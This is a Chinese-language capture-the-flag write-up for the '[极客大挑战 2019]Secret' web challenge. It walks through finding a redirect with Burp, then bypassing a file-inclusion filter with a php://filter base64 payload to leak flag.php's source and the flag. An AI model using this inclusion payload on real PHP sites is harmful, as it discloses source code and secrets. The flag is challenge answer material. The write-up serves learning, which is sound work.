[极客大挑战 2019]Secret

上一题极客大挑战是真放松。。不知道这题也是放松题不

开题页面f12,注意到页面下方那个署名是个链接,但并不能点。所以手动打开

image-20200328134209308

手动打开之后:

image-20200328134224313

点击secret:

image-20200328134233763

多半是重定向,需要用burp走一下:

image-20200328134123485

提示了secr3t.php,访问:

image-20200328134520750

没细看,先访问下flag.php:

image-20200328134636918

。。。

5e7dc3e37ee10

回到上一页,想了想有个文件包含,传入file=flag.php的话确实包含了。但提示flag就在flag.php,应该是要看php源码,想起了文件包含伪协议暴露源码,但可以看到,上面过滤了input和data还有tp。于是想到有个输出base64的方式好像可以绕过去,查证后构造payload:

php://filter/convert.base64-encode/resource=flag.php

页面输出:

PCFET0NUWVBFIGh0bWw+Cgo8aHRtbD4KCiAgICA8aGVhZD4KICAgICAgICA8bWV0YSBjaGFyc2V0PSJ1dGYtOCI+CiAgICAgICAgPHRpdGxlPkZMQUc8L3RpdGxlPgogICAgPC9oZWFkPgoKICAgIDxib2R5IHN0eWxlPSJiYWNrZ3JvdW5kLWNvbG9yOmJsYWNrOyI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+CiAgICAgICAgCiAgICAgICAgPGgxIHN0eWxlPSJmb250LWZhbWlseTp2ZXJkYW5hO2NvbG9yOnJlZDt0ZXh0LWFsaWduOmNlbnRlcjsiPuWViuWTiO+8geS9oOaJvuWIsOaIkeS6hu+8geWPr+aYr+S9oOeci+S4jeWIsOaIkVFBUX5+fjwvaDE+PGJyPjxicj48YnI+CiAgICAgICAgCiAgICAgICAgPHAgc3R5bGU9ImZvbnQtZmFtaWx5OmFyaWFsO2NvbG9yOnJlZDtmb250LXNpemU6MjBweDt0ZXh0LWFsaWduOmNlbnRlcjsiPgogICAgICAgICAgICA8P3BocAogICAgICAgICAgICAgICAgZWNobyAi5oiR5bCx5Zyo6L+Z6YeMIjsKICAgICAgICAgICAgICAgICRmbGFnID0gJ2ZsYWd7MWQ5NzdhNjQtNDRlZS00MWQwLTg2MTMtMWNhMWEwNGFmMGJlfSc7CiAgICAgICAgICAgICAgICAkc2VjcmV0ID0gJ2ppQW5nX0x1eXVhbl93NG50c19hX2cxcklmcmkzbmQnCiAgICAgICAgICAgID8+CiAgICAgICAgPC9wPgogICAgPC9ib2R5PgoKPC9odG1sPgo=

解码后:

<head>
    <meta charset="utf-8">
    <title>FLAG</title>
</head>

<body style="background-color:black;"><br><br><br><br><br><br>

    <h1 style="font-family:verdana;color:red;text-align:center;">啊哈!你找到我了!可是你看不到我QAQ~~~</h1><br><br><br>

    <p style="font-family:arial;color:red;font-size:20px;text-align:center;">
        <?php
            echo "我就在这里";
            $flag = 'flag{1d977a64-44ee-41d0-8613-1ca1a04af0be}';
            $secret = 'jiAng_Luyuan_w4nts_a_g1rIfri3nd'
        ?>
    </p>
</body>

成功获得

-flag{1d977a64-44ee-41d0-8613-1ca1a04af0be}